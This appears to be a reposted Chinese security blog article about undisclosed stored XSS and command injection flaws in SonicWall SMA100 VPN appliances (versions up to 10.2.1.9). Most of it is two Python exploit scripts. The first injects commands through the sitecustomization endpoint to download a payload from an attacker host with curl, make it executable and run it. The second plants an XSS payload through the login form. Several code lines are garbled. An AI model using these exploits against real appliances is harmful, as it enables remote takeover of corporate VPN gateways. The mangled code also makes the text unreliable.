
admin 2024年8月16日21:43:23评论6 views字数 8491阅读28分18秒阅读模式


SonicWall SMA100 中存在身份验证前存储的 XSS 和身份验证后的远程命令注入漏洞。这些漏洞允许未经身份验证的攻击者在经过身份验证的用户暴露于存储的 XSS 时执行任意命令。这些漏洞是在没有任何CVE分配的情况下悄无声息地修补的。删除了存在存储 XSS 漏洞的名为经典模式的整个功能,并添加了新的用户输入过滤代码来防止命令注入漏洞。 


供应商已经发布了 SonicWall SMA100,它完全删除了经典模式,该模式消除了上述漏洞


SonicWall SMA100版本及10.2.1.9以前的版本 




sh-4.2# cat /var/log/eventlog Dec 25 04:44:54 sslvpn SSLVPN: id=sslvpn sn=Unknown time="2022-12-25 04:44:54" vp_time="2022-12-25 12:44:54 UTC" fw= pri=5 m=0 c=700 src= dst= user="admin@LocalDomain" usr="admin@LocalDomain" msg="Log cleared" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"Dec 25 04:44:58 sslvpn SSLVPN: id=sslvpn sn=Unknown time="2022-12-25 04:44:58" vp_time="2022-12-25 12:44:58 UTC" fw= pri=5 m=2 c=2 src= dst= user="admin@LocalDomain" usr="admin@LocalDomain" msg="User logged out" active=112 duration=115 agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"Dec 25 04:45:01 sslvpn SSLVPN: id=sslvpn sn=Unknown time="2022-12-25 04:45:01" vp_time="2022-12-25 12:45:01 UTC" fw= pri=5 m=1 c=1 src= dst= user="admin@LocalDomain" usr="admin@LocalDomain" msg="User login successful" portal="VirtualOffice" domain="LocalDomain" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"


在分析cgi-bin/eventlog时,我找到了ACCEPT BY TABLES。




cgi-bin/sitecustomization中存在一个命令注入漏洞,我们可以在 portalname中输入有效载荷。




import requestsimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)host = "{HOST}"class SonicWall:    def __init__(self, args):        self.headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"        }        self.s = requests.Session()        self.s.verify = False        self.username = args.username        self.password = args.password        self.rhost = args.rhost        self.root_url =        if not"http"):            self.root_url = f"https://{}/"        if not self.root_url.endswith("/"):            self.root_url += "/"    def http_get(self, path, params=None, headers={}):        url = self.root_url + path        headers.update(self.headers)        r = requests.Request(method="GET", url=url, params=params, headers=headers)        prep = r.prepare()        prep.url = url        res = self.s.send(prep)        return res    def http_post(self, path, data, headers={}):        url = self.root_url + path        headers.update(self.headers)        r = requests.Request(method="POST", url=url, data=data, headers=headers)        prep = r.prepare()        prep.url = url        res = self.s.send(prep)        return res    def login(self):        data = {            "username": self.username,            "password": self.password,            "domain": "LocalDomain",            "loginButton": "Login",            "state": "login",            "login": "true",            "verifyCert": "0",            "portalname": "VirtualOffice",            "loginToken": "",            "ajax": "true",        }        res = self.http_post("/cgi-bin/userLogin", data=data)        if '"status":"success"' not in res.text:            return False        if "Set-Cookie" not in res.headers:            return False        self.headers["Cookie"] = res.headers["Set-Cookie"]        return True    def get_csrf_token(self):        res = self.http_get("/cgi-bin/users")        if 'var tokenValue = "' not in res.text:            return None        token = res.text.split('var tokenValue = "')[1].split('"')[0]        return token    def command(self, cmd, csrf_token):        portalname = "$($HTTP_COOKIE)"        portalUrl = "/"        vhostName = "vhostName"        data = {            "portalname": portalname,            "portaltitle": "Virtual Office",            "bannertitle": "Virtual Office",            "bannermessage": "",            "portalUrl": portalUrl,            "httpOnlyCookieFlag": "on",            "cachecontrol": "on",            "uniqueness": "on",            "duplicateLoginAction": "1",            "livetilesmalllogo": "",            "livetilemediumlogo": "",            "livetilewidelogo": "",            "livetilelargelogo": "",            "livetilebackground": "#0085C3",            "livetilename": "",            "home2page": "on",            "allowNetExtender": "on",            "virtualpassagepage": "on",            "cifsdirectpage": "on",            "cifspage": "on",            "cifsdefaultfilesharepath": "",            "home3page": "on",            "showAllBookmarksTab": "on",            "showDefaultTabs": "on",            "showCopyright": "on",            "showSidebar": "on",            "showUserPortalHelpButton": "on",            "userPortalHelpURL": "",            "showUserPortalOptionsButton": "on",            "showUserPortalDownloadsButton": "on",            "homemessage": "<h1>Welcome to the SonicWall Virtual Office</h1><p>SonicWall Virtual Office provides easy and secure remote access to the corporate network from anywhere on the Internet.</p><p>Click a pre-defined bookmark or create your own to securely access a corporate network resource.</p><p>Launch NetExtender to create a secure network connection to the corporate network for full network access.</p>",            "hptabletitle": "Virtual Office Bookmarks",            "vhostName": vhostName,            "vhostAlias": "",            "vhostHTTPSPort": "",            "vhostInterface": "ALL",            "vhostCert": "default",            "vhostEnableKeepAlive": "on",            "cdssodn": "",            "enableSSLProxyVerify": "0",            "sslProxyProtocol": "0",            "loginSchedule": (                "000000000000000000000000000000000000000"                "000000000000000000000000000000000000000"                "000000000000000000000000000000000000000"                "000000000000000000000000000000000000000"                "000000000000"            ),            "formsection": "main",            "doAdd": "1",            "cgiaction": "1",            "themename": "stylesonicwall",            "onlinehelp": "",            "tmp_currentVhostName": "",            "tmp_currentVhostAlias": "",            "tmp_currentVhostHTTPSPort": "0",            "tmp_currentVhostInterface": "ALL",            "tmp_currentVhostIp": "",            "tmp_currentVhostIPv6": "",            "tmp_currentVhostEnableCertCheck": "0",            "tmp_currentVhostEnableHTTP": "0",            "tmp_currentVhostEnableKeepAlive": "1",            "tmp_currentVhostCert": "",            "tmp_currEnforceSSLProxyProtocol": "0",            "tmp_currSSLProxyProtocol": "0",            "tmp_currEnableSSLProxyVerify": "0",            "tmp_currEnableSSLForwardSecrecy": "0",            "tmp_currentVhostOffloadRewrite": "",            "tmp_currentHSTSFlag": "0",            "restartWS": "1",            "reuseFavicon": "",            "oldReuseFavicon": "",            "swcctn": csrf_token,        }        backup_cookie = self.headers["Cookie"]        self.headers["Cookie"] = f"{cmd} ; exit ; " + backup_cookie        res = self.http_post("/cgi-bin/sitecustomization", data=data)        if (            "Virtual Host Name not set - A Portal with the same virtual host name already exists."            in res.text        ):            print("[-] failed: duplicated name")            return False        self.headers["Cookie"] = backup_cookie        data = {"delete": portalname, "swcctn": csrf_token}        res = self.http_post("/cgi-bin/portallist", data=data)        if portalname in res.text:            print("[-] failed: deleting name")            return False        return True    def run(self):        print("[+] login")        is_login = self.login()        print(f"    result: {is_login}")        if not is_login:            return        print("[+] csrf token")        csrf_token = self.get_csrf_token()        print(f"    {csrf_token}")        print("[+] saving payload into target")        self.command(f"curl -o /tmp/c {self.rhost}", csrf_token)        if self.command(f"curl -o /tmp/c {self.rhost}", csrf_token) and self.command(            "chmod 777 /tmp/c", csrf_token        ):            print("    success")        print("[+] execute")        if self.command("/tmp/c", csrf_token):            print("    success")if __name__ == "__main__":    parser = argparse.ArgumentParser(description="SonicWall SMA Exploit")    parser.add_argument("host", type=str, help="victim host")    parser.add_argument("rhost", type=str, help="reverse host (http/https uri)")    parser.add_argument("username", type=str, help="username")    parser.add_argument("password", type=str, help="password")    args = parser.parse_args()    e = SonicWall(args)
import requestsimport jsonimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)class SonicWall:    def __init__(self, args):        self.s = requests.Session()        self.s.verify = False        self.rhost = args.rhost        self.root_url =        if not"http"):            self.root_url = f"https://{}/"        if not self.root_url.endswith("/"):            self.root_url += "/"    def http_post(self, path, data, headers={}):        url = self.root_url + path        r = requests.Request(method="POST", url=url, data=data, headers=headers)        prep = r.prepare()        prep.url = url        res = self.s.send(prep)        return res    def run(self):        payload = f"<img/src=STOREDXSS>"        assert len(payload) < 64        print("[+] send payload")        data = {            "username": f"c=1003 ACCEPT_BY_IPTABLES SRC={payload} ",            "password": "password",            "domain": "LocalDomain",            "loginButton": "Login",            "state": "login",            "login": "true",            "verifyCert": "0",            "portalname": "VirtualOffice",            "loginToken": "",            "ajax": "true",        }        path = f"cgi-bin/userLogin"        res = self.http_post(path, data=data)        print(res.text)        print("    complete")if __name__ == "__main__":    with open("config.json", "r") as f:        config =    config = json.loads(config)    parser = argparse.ArgumentParser(description="SonicWall SMA Exploit")    parser.add_argument(        "--host", type=str, help="victim host", default=config["target"]    )    parser.add_argument(        "--rhost",        type=str,        help="reverse host (http/https uri)",        default=config["xss_url"],    )    args = parser.parse_args()    e = SonicWall(args)



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